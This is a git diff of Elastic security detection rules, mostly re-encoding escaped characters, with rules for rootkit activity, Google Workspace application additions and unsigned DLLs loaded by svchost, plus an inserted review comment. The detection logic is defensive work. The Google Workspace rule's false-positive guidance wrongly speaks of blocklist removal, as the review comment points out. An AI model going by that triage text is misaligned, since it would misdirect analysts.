"event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": 
"process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7787362c-90ff-4b1a-b313-8808b1020e64", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.013", + "name": "KernelCallbackTable", + "reference": "https://attack.mitre.org/techniques/T1574/013/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "7787362c-90ff-4b1a-b313-8808b1020e64_1", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_1.json b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_1.json
index c689e96b1e5..e95653ac7f6 100644
--- a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_1.json
@@ -42,7 +42,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -57,7 +57,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0043",
 "name": "Reconnaissance",
diff --git a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_2.json b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_2.json
index 1607a40ae2a..da4b147802b 100644
--- a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_2.json
@@ -47,7 +47,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -62,7 +62,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0043",
 "name": "Reconnaissance",
diff --git a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_3.json b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_3.json
index 1f3c659534f..e585bc09402 100644
--- a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_3.json
@@ -49,7 +49,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -64,7 +64,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0043",
 "name": "Reconnaissance",
diff --git a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_4.json b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_4.json
index f7e64608e82..a74d04bca6c 100644
--- a/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/781f8746-2180-4691-890c-4c96d11ca91d_4.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
@@ -65,7 +65,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0043",
 "name": "Reconnaissance",
diff --git a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_203.json b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_203.json
index d744cf1ff80..cc25a48826c 100644
--- a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_203.json
+++ b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_203.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_204.json b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_204.json
index 55a8b667854..02ed3d52218 100644
--- a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_204.json
+++ b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_204.json
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Application Added to Google Workspace Domain", - "note": "## Triage and analysis\n\n### Investigating Application Added to Google Workspace Domain\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or on Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule checks for applications that were manually added to the Marketplace by a Google Workspace account.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security \u003e Investigation tool` with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With 
access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps \u003e Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Application Added to Google Workspace Domain\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or on Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. 
Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule checks for applications that were manually added to the Marketplace by a Google Workspace account.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security > Investigation tool` with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps > Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from 
the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval 
that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ADD_APPLICATION\n", "references": [ "https://support.google.com/a/answer/6328701?hl=en#" @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_205.json b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_205.json index f6e724863aa..1028fe7c6ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_205.json +++ b/packages/security_detection_engine/kibana/security_rule/785a404b-75aa-4ffd-8be5-3334a5a544dd_205.json 
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Application Added to Google Workspace Domain", - "note": "## Triage and analysis\n\n### Investigating Application Added to Google Workspace Domain\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or on Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule checks for applications that were manually added to the Marketplace by a Google Workspace account.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security \u003e Investigation tool` with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With 
access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps \u003e Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Application Added to Google Workspace Domain\n\nGoogle Workspace Marketplace is an online store for free and paid web applications that work with Google Workspace services and third-party software. Listed applications are based on Google APIs or on Google Apps Script and created by both Google and third-party developers.\n\nMarketplace applications require access to specific Google Workspace resources. 
Applications can be installed by individual users, if they have permission, or can be installed for an entire Google Workspace domain by administrators. Consent screens typically display what permissions and privileges the application requires during installation. As a result, malicious Marketplace applications may require more permissions than necessary or have malicious intent.\n\nGoogle clearly states that they are not responsible for any product on the Marketplace that originates from a source other than Google.\n\nThis rule checks for applications that were manually added to the Marketplace by a Google Workspace account.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- This rule relies on data from `google_workspace.admin`, thus indicating the associated user has administrative privileges to the Marketplace.\n- With access to the Google Workspace admin console, visit the `Security > Investigation tool` with filters for the user email and event is `Assign Role` or `Update Role` to determine if new cloud roles were recently updated.\n- With the user account, review other potentially related events within the last 48 hours.\n- Re-assess the permissions and reviews of the Marketplace applications to determine if they violate organizational policies or introduce unexpected risks.\n- With access to the Google Workspace admin console, determine if the application was installed domain-wide or individually by visiting `Apps > Google Workspace Marketplace Apps`.\n\n### False positive analysis\n\n- Google Workspace administrators might intentionally remove an application from the blocklist due to a re-assessment or a domain-wide required need for the application.\n- Identify the user account associated with this action and assess their administrative privileges with Google Workspace Marketplace.\n- Contact the user to verify that they intentionally removed the application from 
the blocklist and their reasoning.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval 
that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:ADD_APPLICATION\n", "references": [ "https://support.google.com/a/answer/6328701?hl=en#" @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_104.json b/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_104.json index d170636c1d7..9904f137587 100644 --- a/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -71,7 +71,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json b/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json index d4fef92e4c8..abedf3c5a73 100644 --- a/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json 
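Review bot: The "False positive analysis" section of the new `note` string still describes a blocklist-removal scenario ("administrators might intentionally remove an application from the blocklist", "verify that they intentionally removed the application from the blocklist"), which does not match this rule's name or its `event.action:ADD_APPLICATION` query and reads as text carried over from a sibling rule. The commit only re-encodes `\u003e` as `>` here, so the mismatch survives into this version, and the same wording is visible in the preceding version's hunk, which starts before this chunk. Consider `- Google Workspace administrators might intentionally add an application to the domain after a security review or because of a domain-wide business need.` and `- Contact the user to verify that they intentionally added the application and their reasoning.`. The "Important Information" paragraph asserts a 10-minute run interval and a 130-minute lookback; the rule's schedule fields are not in this hunk, so it is worth confirming those numbers still match them.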
+++ b/packages/security_detection_engine/kibana/security_rule/7882cebf-6cf1-4de3-9662-213aa13e8b80_105.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -69,7 +69,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_2.json b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_2.json index 5b23fcfbadc..3037a955ded 100644 --- a/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_2.json +++ b/packages/security_detection_engine/kibana/security_rule/78ef0c95-9dc2-40ac-a8da-5deb6293a14e_2.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unsigned DLL Loaded by Svchost", - "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created within 5 minutes of the library load event - compatible with Elastic Endpoint 8.4+ */\n dll.Ext.relative_file_creation_time \u003c= 300 or \n \n /* unusual paths */\n dll.path :(\"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\PerfLogs\\\\*\",\n \"?:\\\\Windows\\\\Tasks\\\\*\",\n \"?:\\\\Intel\\\\*\",\n \"?:\\\\AMD\\\\Temp\\\\*\",\n \"?:\\\\Windows\\\\AppReadiness\\\\*\",\n \"?:\\\\Windows\\\\ServiceState\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"?:\\\\Windows\\\\Branding\\\\*\",\n \"?:\\\\Windows\\\\csc\\\\*\",\n \"?:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"?:\\\\Windows\\\\en-US\\\\*\",\n \"?:\\\\Windows\\\\wlansvc\\\\*\",\n \"?:\\\\Windows\\\\Prefetch\\\\*\",\n \"?:\\\\Windows\\\\Fonts\\\\*\",\n \"?:\\\\Windows\\\\diagnostics\\\\*\",\n \"?:\\\\Windows\\\\TAPI\\\\*\",\n \"?:\\\\Windows\\\\INF\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"?:\\\\windows\\\\tracing\\\\*\",\n \"?:\\\\windows\\\\IME\\\\*\",\n \"?:\\\\Windows\\\\Performance\\\\*\",\n \"?:\\\\windows\\\\intel\\\\*\",\n \"?:\\\\windows\\\\ms\\\\*\",\n \"?:\\\\Windows\\\\dot3svc\\\\*\",\n \"?:\\\\Windows\\\\panther\\\\*\",\n \"?:\\\\Windows\\\\RemotePackages\\\\*\",\n \"?:\\\\Windows\\\\OCR\\\\*\",\n \"?:\\\\Windows\\\\appcompat\\\\*\",\n \"?:\\\\Windows\\\\apppatch\\\\*\",\n \"?:\\\\Windows\\\\addins\\\\*\",\n \"?:\\\\Windows\\\\Setup\\\\*\",\n \"?:\\\\Windows\\\\Help\\\\*\",\n \"?:\\\\Windows\\\\SKB\\\\*\",\n 
\"?:\\\\Windows\\\\Vss\\\\*\",\n \"?:\\\\Windows\\\\servicing\\\\*\",\n \"?:\\\\Windows\\\\CbsTemp\\\\*\",\n \"?:\\\\Windows\\\\Logs\\\\*\",\n \"?:\\\\Windows\\\\WaaS\\\\*\",\n \"?:\\\\Windows\\\\twain_32\\\\*\",\n \"?:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"?:\\\\Windows\\\\ShellComponents\\\\*\",\n \"?:\\\\Windows\\\\PLA\\\\*\",\n \"?:\\\\Windows\\\\Migration\\\\*\",\n \"?:\\\\Windows\\\\debug\\\\*\",\n \"?:\\\\Windows\\\\Cursors\\\\*\",\n \"?:\\\\Windows\\\\Containers\\\\*\",\n \"?:\\\\Windows\\\\Boot\\\\*\",\n \"?:\\\\Windows\\\\bcastdvr\\\\*\",\n \"?:\\\\Windows\\\\TextInput\\\\*\",\n \"?:\\\\Windows\\\\security\\\\*\",\n \"?:\\\\Windows\\\\schemas\\\\*\",\n \"?:\\\\Windows\\\\SchCache\\\\*\",\n \"?:\\\\Windows\\\\Resources\\\\*\",\n \"?:\\\\Windows\\\\rescache\\\\*\",\n \"?:\\\\Windows\\\\Provisioning\\\\*\",\n \"?:\\\\Windows\\\\PrintDialog\\\\*\",\n \"?:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"?:\\\\Windows\\\\media\\\\*\",\n \"?:\\\\Windows\\\\Globalization\\\\*\",\n \"?:\\\\Windows\\\\L2Schemas\\\\*\",\n \"?:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"?:\\\\Windows\\\\ModemLogs\\\\*\",\n \"?:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"?:\\\\$Recycle.Bin\\\\*\")\n ) and \n \n not dll.hash.sha256 : \n (\"3ed33e71641645367442e65dca6dab0d326b22b48ef9a4c2a2488e67383aa9a6\", \n \"b4db053f6032964df1b254ac44cb995ffaeb4f3ade09597670aba4f172cf65e4\", \n \"214c75f678bc596bbe667a3b520aaaf09a0e50c364a28ac738a02f867a085eba\", \n \"23aa95b637a1bf6188b386c21c4e87967ede80242327c55447a5bb70d9439244\", \n \"5050b025909e81ae5481db37beb807a80c52fc6dd30c8aa47c9f7841e2a31be7\")\n", + "query": "library where host.os.type == \"windows\" and\n\n process.executable : \n (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\Syswow64\\\\svchost.exe\") and \n \n dll.code_signature.trusted != true and \n \n not dll.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and \n \n dll.hash.sha256 != null and \n \n (\n /* DLL created 
